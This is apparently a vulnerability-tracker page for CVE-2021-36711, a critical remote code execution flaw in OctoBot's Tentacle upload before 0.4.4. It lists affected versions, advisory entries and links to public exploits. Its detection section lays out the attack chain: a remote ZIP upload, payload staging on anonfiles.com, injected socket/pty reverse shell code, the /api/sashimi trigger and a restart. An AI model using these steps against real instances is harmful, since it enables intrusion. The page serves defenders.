CVE-2021-36711
published 2022-07-16CVE-2021-36711: WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
PriorityP273critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
12.08%
95.6th percentile
WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| octobot | octobot | < 0.4.4 | 0.4.4 |
| octobot | octobot | >= 0 < 0.4.4 | 0.4.4 |
Detection & IOCsextracted from sources · hover to see the quote
urlhttps://static.octobot.online/tentacles/officials/packages/full/base/{octobotVersion}/any_platform.zip↗
- →Detect POST requests to /advanced/tentacle_packages?update_type=add_package with Content-Type: application/json and X-Requested-With: XMLHttpRequest headers, containing a JSON body with a remote ZIP URL mapped to 'register_and_install'. ↗
- →Alert on HTTP requests to /api/sashimi with LHOST and LPORT query parameters, which triggers the injected reverse shell endpoint. ↗
- →Monitor for outbound connections from the OctoBot process to anonfiles.com, used by the exploit to stage the malicious ZIP payload. ↗
- →Flag GET requests to /commands/restart immediately following a Tentacle package upload, as the exploit restarts OctoBot to activate the injected backdoor. ↗
- →Inspect uploaded ZIP packages to OctoBot for the presence of modified reference_tentacles/Services/Interfaces/web_interface/api/metadata.py containing socket/pty reverse shell code. ↗
- ·The exploit only works against OctoBot instances with no password protection; a 302/non-200 response to the root URL indicates the instance is password-protected and the exploit will abort. ↗
- ·Affected versions are OctoBot 0.4.0beta3 through 0.4.3; versions 0.4.4 and above are patched. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Octobot mishandles Tentacles upload
osv·2022-07-17
CVE-2021-36711 [CRITICAL] Octobot mishandles Tentacles upload
Octobot mishandles Tentacles upload
WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
GHSA
Octobot mishandles Tentacles upload
ghsa·2022-07-17
CVE-2021-36711 [CRITICAL] CWE-434 Octobot mishandles Tentacles upload
Octobot mishandles Tentacles upload
WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
OSV
CVE-2021-36711: WebInterface in OctoBot before 0
osv·2022-07-16
CVE-2021-36711 CVE-2021-36711: WebInterface in OctoBot before 0
WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/167780/OctoBot-WebInterface-0.4.3-Remote-Code-Execution.htmlhttps://github.com/Drakkar-Software/OctoBot/blob/master/CHANGELOG.mdhttps://github.com/Drakkar-Software/OctoBot/issues/1966https://github.com/Nwqda/Sashimi-Evil-OctoBot-Tentaclehttps://packetstormsecurity.com/files/167721/Sashimi-Evil-OctoBot-Tentacle.htmlhttps://www.octobot.online/http://packetstormsecurity.com/files/167780/OctoBot-WebInterface-0.4.3-Remote-Code-Execution.htmlhttps://github.com/Drakkar-Software/OctoBot/blob/master/CHANGELOG.mdhttps://github.com/Drakkar-Software/OctoBot/issues/1966https://github.com/Nwqda/Sashimi-Evil-OctoBot-Tentaclehttps://packetstormsecurity.com/files/167721/Sashimi-Evil-OctoBot-Tentacle.htmlhttps://www.octobot.online/
2022-07-16
Published